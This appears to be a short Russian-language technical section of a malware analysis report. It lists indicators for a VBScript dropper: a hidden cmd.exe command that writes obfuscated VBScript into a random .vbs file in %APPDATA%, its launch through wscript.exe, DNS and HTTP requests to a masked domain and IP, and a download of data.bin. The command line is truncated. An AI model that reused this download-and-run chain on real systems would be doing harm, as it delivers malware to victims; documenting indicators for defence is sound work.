Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "FnEkbyV=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm D1gb" "SuB GHX2p1(XT8Dm)" "UAD0=6" "diM QsDYNaQ" "LkAT7v=33" "QsDYNaQ=tIMER+XT8Dm" "Do wHIlE TiMeR<QsDYNaQ" "LOOp" "L1=51" "EnD su...
- %APPDATA%\16657.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\16657.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "FnEkbyV=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm D1gb" "SuB GHX2p1(XT8Dm)" "UAD0=6" "diM QsDYNaQ" "LkAT7v=33" "QsDYNaQ=tIMER+XT8Dm" "Do wHIlE TiMeR<QsDYNaQ" "LOOp" "L1=51" "EnD su...' (со скрытым окном)